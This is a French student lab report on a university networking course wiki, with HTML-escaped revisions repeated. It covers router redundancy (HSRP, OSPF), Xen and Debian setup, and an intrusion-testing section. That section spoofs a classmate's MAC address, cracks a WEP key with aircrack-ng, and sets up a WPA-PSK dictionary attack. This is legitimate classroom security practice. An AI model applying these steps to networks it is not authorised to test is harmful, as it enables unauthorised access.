&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;10&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Hub&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.176/28&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.188&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.190&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;131&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Interco&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.8/29&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.9&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;X&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera &amp;quot;prise&amp;quot; par le routeur le plus prioritaire. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code sous minicom pour réaliser l'adressage des VLan's: &lt;br /&gt;
&lt;br /&gt;
- en // passage en mode administrateur&lt;br /&gt;
- conf t &lt;br /&gt;
- int vlan2 //modification du vlan2&lt;br /&gt;
- ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2&lt;br /&gt;
- standby 1 ip 172.20.100.254 // adresse de passerelle&lt;br /&gt;
- standby 1 preempt  //Utilisation du protocole HSRP nécessaire à la redondance&lt;br /&gt;
- standby 1 priority 110 // priorité pour la prise de l'adresse passerelle&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un nom à un VLAN: &lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- vlan8&lt;br /&gt;
- name Papy&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un port (içi pour internet)&lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- interface GigabitEthernet 0/47 // on agit sur ce port&lt;br /&gt;
- Sitchport mode access&lt;br /&gt;
- switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet&lt;br /&gt;
- no shut&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour l'échange automatique des tables de routages :&lt;br /&gt;
&lt;br /&gt;
- Switch(config)#router ospf 1&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes&lt;br /&gt;
-Switch(config-router)#router-id 172.20.100.252&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes   &lt;br /&gt;
-Switch(config-router)#summary-address 172.20.96.0 255.255.240.0&lt;br /&gt;
-Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
-Switch(config-router)#redistribute connected metric 20 subnets &lt;br /&gt;
-Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Tests d'intrusion &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Intrusion par changement d'adresse MAC&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.&lt;br /&gt;
En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. &lt;br /&gt;
&lt;br /&gt;
RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. &lt;br /&gt;
&lt;br /&gt;
SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Avec une simple ligne de code : je change mon adresse MAC !&lt;br /&gt;
- ifconfig wlan0 down&lt;br /&gt;
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1  //adresse mac de Gauthier&lt;br /&gt;
- ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de clef WEP d'un point d'accès Wifi&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A partir de là Linux est installé sur la machine. Je vais donc passer maintenant au crackage de la clé WEP.&lt;br /&gt;
&lt;br /&gt;
Pour cela j'installe aircrack.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code : &lt;br /&gt;
apt-get install aircrack-ng&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Modification du fichier /etc/apt/sources.list : &lt;br /&gt;
rajout de contrib non-free&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/network/interfaces : &lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static &lt;br /&gt;
     address 172.20.106.6&lt;br /&gt;
     netmask 255.255.255.0&lt;br /&gt;
     gateway 172.20.106.254&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/resolv.conf : &lt;br /&gt;
nameserver 193.48.57.34&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code : &lt;br /&gt;
apt-get install firmware-linux-nonfree&lt;br /&gt;
apt-get remove network-manager&lt;br /&gt;
apt-get install broadcom-sta-dkms&lt;br /&gt;
modprobe wl&lt;br /&gt;
modprobe -r b44 b43 b43legacy ssb brcmsmac&lt;br /&gt;
modprobe -r wl&lt;br /&gt;
modprobe wl*dmseg&lt;br /&gt;
dmseg&lt;br /&gt;
ifconfig -a &lt;br /&gt;
reboot&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A partir de là je tape la commande airmon-ng et j'obtiens enfin wlan0, Broadcom et wl - [phy0]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
code :&lt;br /&gt;
airmon -ng start wlan1 ==&amp;gt; cela ne fonctionne pas grâce a dmseg on voit que c'est à cause de fail to load rt2870.bin&lt;br /&gt;
soltion : apt-get install firmware-ralink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Je stop les deux mon0 et mon1 que j'avais créé : via la commande airmon-ng stop mon1 et mon0&lt;br /&gt;
&lt;br /&gt;
Je ré-ouvre une mon0.&lt;br /&gt;
&lt;br /&gt;
J'utilise la commande airodump-ng mon0 afin voir tous les SSID qui passent en WIFI.&lt;br /&gt;
&lt;br /&gt;
Ma cible étant les cracottes je filtre pour n'avoir qu'elles en selectionnant le channel 5 car elles y sont tous dessus.&lt;br /&gt;
&lt;br /&gt;
Code : airodump-ng mon0 --channel 5. Je ne voit que les cracottes. Je prends la cracotte qui me concerne, c'est à dire la 8. (même numéro de vlan que moi)&lt;br /&gt;
&lt;br /&gt;
code : airodump-ng mon0 --channel 5 --BSSID 04:da:d2:9c:50:57 ainsi je ne vois que la cracotte que je veux.&lt;br /&gt;
&lt;br /&gt;
Maintenant pour copier les données dans un fichier il me suffit de rajouter l'option --w nomDeFichier&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Grâce à la commande aircrack-ng -s *.cap : la clé WEP de la cracotte08 a été cracké : celle-ci est : aa:aa:aa:aa:aa:aa:aa:aa:aa:bb:bb:bb:bb ! &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de mot de passe WPA-PSK par force brute&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On va commencer par créer un dictionnaire  de clé : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
int main (void)&lt;br /&gt;
{&lt;br /&gt;
    int i=0;&lt;br /&gt;
    while(i&amp;lt;100000000)&lt;br /&gt;
    {&lt;br /&gt;
        printf(&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
        i++;&lt;br /&gt;
    }&lt;br /&gt;
    return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite récupérer le handshake :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng mon0 --channel 7 --bssid 04:da:d2:9c:50:57 -w handshake&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
J'envoie le fichier handshake-01.cap sur la zabeth car le PC est beaucoup plus rapide pour réaliser le traitement et trouver la clé.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
df&lt;br /&gt;
fdisk -l&lt;br /&gt;
mkfs /dev/sda1&lt;br /&gt;
mount /dev/sda1 /mnt&lt;br /&gt;
cp handshake-01.cap /mnt&lt;br /&gt;
umount /mnt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois que le fichier est sur pifou, je lance le traitement :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
aircrack-ng -w dico.txt handshake-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Installation des systèmes d'exploitation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
nano /etc/ssh/sshd_config allow root login (without password)-&amp;gt;yes&lt;br /&gt;
apt -get purge network-manager systemd&lt;br /&gt;
init tab ==&amp;gt; 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Hostname        :  Werewolf&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:25:96:A7&lt;br /&gt;
IP Address(es)  :  193.48.57.18&lt;br /&gt;
RSA Fingerprint :  4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e&lt;br /&gt;
Root Password   :  Il ne serait plus secret sinon ;)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A RETENIR :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Pour ouvrir la machine : xl console Werewolf&lt;br /&gt;
Pour la fermer : halt&lt;br /&gt;
Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Services Internet&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Le nom de domaine que j'ai réservé est : hunt3r.lol&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Réalisation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt; Installation de LINUX sur les nouveaux PC HP &amp;lt;/h3&amp;gt;&lt;br /&gt;
J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]&lt;br /&gt;
&lt;br /&gt;
Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
On va donc configurer le réseau nous-même.&lt;br /&gt;
Adresse IP : 172.20.106.6&lt;br /&gt;
Mask : 255.255.255.0&lt;br /&gt;
Adresse passerelle : 172.20.106.254&lt;br /&gt;
Adresse des serveurs de noms : 193.48.57.34&lt;br /&gt;
Nom de machine : perche&lt;br /&gt;
Domaine : deule.net&lt;br /&gt;
&lt;br /&gt;
Mot de passe pour superutilisateur : celui de d'habitude pour un root&lt;br /&gt;
Nouvel utilisateur : pifou&lt;br /&gt;
Mot de passe nouvel utilisateur : celui de d'habitude pour pifou&lt;br /&gt;
&lt;br /&gt;
Arrivée au partitionnement :&lt;br /&gt;
&lt;br /&gt;
J'ai cliqué sur manuel puis sur le n°3 qui avait 22 Gb. J'ai partitionné à 8Gb de façon à avoir 8Gb pour Windows ( on s'en fou de lui) et 14.6Gb pour nous. J'ai ensuite cliqué partitionnement assisté et utiliser le plus grand espace disponible. &lt;br /&gt;
Nom du miroir de l'archive Debian : debian.polytech-lille.fr&lt;br /&gt;
Mandataire HTTP : http://proxy.polytech-lille.fr:3128&lt;br /&gt;
Logiciels à installer : Xfce, service SSH  et utilitaies usuels du système (à valider à l'aider de la barre espace)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ebourre</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=23084</id>
		<title>TP sysres IMA2a5 2015/2016 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=23084"/>
				<updated>2015-11-20T08:35:30Z</updated>
		
		<summary type="html">&lt;p&gt;Ebourre : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt; Projet Systèmes&amp;amp;Réseaux IMA2A5 &amp;lt;/h1&amp;gt;&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. &amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Architecture réseau &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.&lt;br /&gt;
&lt;br /&gt;
La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;'''N° du VLAN'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Nom'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse IP'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Routeur 1'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Passerelle'''&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;2&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Puduc&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;3&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;4&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;5&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Relax&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;6&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;7&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;8&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Papy&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;10&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Hub&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.176/28&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.188&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.190&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;131&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Interco&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.8/29&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.9&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;X&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera &amp;quot;prise&amp;quot; par le routeur le plus prioritaire. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code sous minicom pour réaliser l'adressage des VLan's: &lt;br /&gt;
&lt;br /&gt;
- en // passage en mode administrateur&lt;br /&gt;
- conf t &lt;br /&gt;
- int vlan2 //modification du vlan2&lt;br /&gt;
- ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2&lt;br /&gt;
- standby 1 ip 172.20.100.254 // adresse de passerelle&lt;br /&gt;
- standby 1 preempt  //Utilisation du protocole HSRP nécessaire à la redondance&lt;br /&gt;
- standby 1 priority 110 // priorité pour la prise de l'adresse passerelle&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un nom à un VLAN: &lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- vlan8&lt;br /&gt;
- name Papy&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un port (içi pour internet)&lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- interface GigabitEthernet 0/47 // on agit sur ce port&lt;br /&gt;
- Sitchport mode access&lt;br /&gt;
- switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet&lt;br /&gt;
- no shut&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour l'échange automatique des tables de routages :&lt;br /&gt;
&lt;br /&gt;
- Switch(config)#router ospf 1&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes&lt;br /&gt;
-Switch(config-router)#router-id 172.20.100.252&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes   &lt;br /&gt;
-Switch(config-router)#summary-address 172.20.96.0 255.255.240.0&lt;br /&gt;
-Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
-Switch(config-router)#redistribute connected metric 20 subnets &lt;br /&gt;
-Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Tests d'intrusion &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Intrusion par changement d'adresse MAC&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.&lt;br /&gt;
En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. &lt;br /&gt;
&lt;br /&gt;
RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. &lt;br /&gt;
&lt;br /&gt;
SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Avec une simple ligne de code : je change mon adresse MAC !&lt;br /&gt;
- ifconfig wlan0 down&lt;br /&gt;
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1  //adresse mac de Gauthier&lt;br /&gt;
- ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de clef WEP d'un point d'accès Wifi&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A partir de là Linux est installé sur la machine. Je vais donc passer maintenant au crackage de la clé WEP.&lt;br /&gt;
&lt;br /&gt;
Pour cela j'installe aircrack.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code : &lt;br /&gt;
apt-get install aircrack-ng&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Modification du fichier /etc/apt/sources.list : &lt;br /&gt;
rajout de contrib non-free&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/network/interfaces : &lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static &lt;br /&gt;
     address 172.20.106.6&lt;br /&gt;
     netmask 255.255.255.0&lt;br /&gt;
     gateway 172.20.106.254&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/resolv.conf : &lt;br /&gt;
nameserver 193.48.57.34&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code : &lt;br /&gt;
apt-get install firmware-linux-nonfree&lt;br /&gt;
apt-get remove network-manager&lt;br /&gt;
apt-get install broadcom-sta-dkms&lt;br /&gt;
modprobe wl&lt;br /&gt;
modprobe -r b44 b43 b43legacy ssb brcmsmac&lt;br /&gt;
modprobe -r wl&lt;br /&gt;
modprobe wl*dmseg&lt;br /&gt;
dmseg&lt;br /&gt;
ifconfig -a &lt;br /&gt;
reboot&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A partir de là je tape la commande airmon-ng et j'obtiens enfin wlan0, Broadcom et wl - [phy0]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
code :&lt;br /&gt;
airmon -ng start wlan1 ==&amp;gt; cela ne fonctionne pas grâce a dmseg on voit que c'est à cause de fail to load rt2870.bin&lt;br /&gt;
soltion : apt-get install firmware-ralink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Je stop les deux mon0 et mon1 que j'avais créé : via la commande airmon-ng stop mon1 et mon0&lt;br /&gt;
&lt;br /&gt;
Je ré-ouvre une mon0.&lt;br /&gt;
&lt;br /&gt;
J'utilise la commande airodump-ng mon0 afin voir tous les SSID qui passent en WIFI.&lt;br /&gt;
&lt;br /&gt;
Ma cible étant les cracottes je filtre pour n'avoir qu'elles en selectionnant le channel 5 car elles y sont tous dessus.&lt;br /&gt;
&lt;br /&gt;
Code : airodump-ng mon0 --channel 5. Je ne voit que les cracottes. Je prends la cracotte qui me concerne, c'est à dire la 8. (même numéro de vlan que moi)&lt;br /&gt;
&lt;br /&gt;
code : airodump-ng mon0 --channel 5 --BSSID 04:da:d2:9c:50:57 ainsi je ne vois que la cracotte que je veux.&lt;br /&gt;
&lt;br /&gt;
Maintenant pour copier les données dans un fichier il me suffit de rajouter l'option --w nomDeFichier&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Grâce à la commande aircrack-ng -s *.cap : la clé WEP de la cracotte08 a été cracké : celle-ci est : aa:aa:aa:aa:aa:aa:aa:aa:aa:bb:bb:bb:bb ! &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
